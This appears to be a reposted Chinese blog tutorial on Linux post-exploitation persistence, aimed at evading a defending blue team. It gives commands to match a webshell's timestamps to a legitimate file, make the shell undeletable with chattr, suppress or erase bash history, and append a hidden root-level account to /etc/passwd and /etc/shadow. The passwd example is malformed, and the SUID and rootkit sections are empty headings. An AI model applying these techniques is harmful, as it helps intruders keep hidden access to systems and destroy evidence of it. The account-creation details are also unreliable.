一、修改文件/終端的屬性

1、修改文件創建時間

如果藍隊是按照文件修改時間來判斷后門的話，比如現在我們上傳一個shell，可以看到shell文件與原文件的時間是不同的

解決方法：

touch -r teamserver shell.php

現在再來看原文件與shell文件的修改時間，就會看得到執行命令后的shell文件時間與原文件一致了：

Linux touch命令用于修改文件或者目錄的時間屬性，包括存取時間和更改時間。若文件不存在，系統會建立一個新的文件。ls -l 可以顯示檔案的時間記錄。

2、文件鎖定

在Linux中，使用chattr命令設置文件屬性，使得root用戶和其他管理員用戶也無法修改刪除文件，此權限用ls -l是無法查到的，達到隱藏權限的作用。

chattr +i shell.php #不得任意更改文件或目錄

lsattr shell.php #雖然ls -l無法查到，但lsattr可以顯示文件屬性

當我們執行了chattr命令后，即使是root權限也不能刪除或者移動文件

解除鎖定屬性：

chattr -i shell.php #解除屬性

lsattr shel.php

這時候才能作改動

3、歷史記錄

在Linux系統中，使用history命令可以查看歷史記錄，如何能讓自己的操作不被記錄在歷史記錄中呢

解決方法1：關閉歷史記錄

[space]set +o history #[space]表示空格，加一個空格在前面，這條命令就不會被記錄

在執行了這條命令之后的所有操作都不會被記錄，知道解除關閉歷史記錄

set -o history #恢復系統環境

(測試了下，只要在命令前加一個空格，都不會被記錄到history中，這也算一種解決方法噢)

解決方法2：刪除歷史記錄

history -c #清除本次留在緩存中的所有操作記錄

但其實在 ~/.bash_history文件中記錄了所有的操作記錄，想要刪除的更徹底的話，可以直接刪除這個文件里的記錄

大規模刪除，只留.bash_history文件中的前十行：

sed -i '10,$d' .bash_history

4、passwd寫入

/etc/passwd 各部分含義：

用戶名：密碼：用戶ID：組ID：身份描述：用戶的家目錄：用戶登錄后所使用的SHELL

/etc/shadow 各部分含義：

用戶名：密碼的MD5加密值：自系統使用以來口令被修改的天數：口令的最小修改間隔：口令更改的周期：口令失效的天數：口令失效以后帳號會被鎖定多少天：用戶帳號到期時間：保留字段尚未使用

栗子：

1、增加超級用戶

root@kali:~# perl -le 'print crypt("jiuguan","salt")'saZgF2xQK4016

root@kali:~# echo "jiuguan:saZgF2xQK4016:hacker:/root:/bin/bash" >> /etc/passwd

2、如果系統不允許uid=0的用戶登錄，那么可以增加一個普通用戶

root@kali:~# echo "jiuguan:saZgF2xQK4016:-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

二、SUID后門???

三、LKM Linux rootKit后門

總結

以上是生活随笔為你收集整理的Linux内核权限维持,Linux权限维持笔记的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。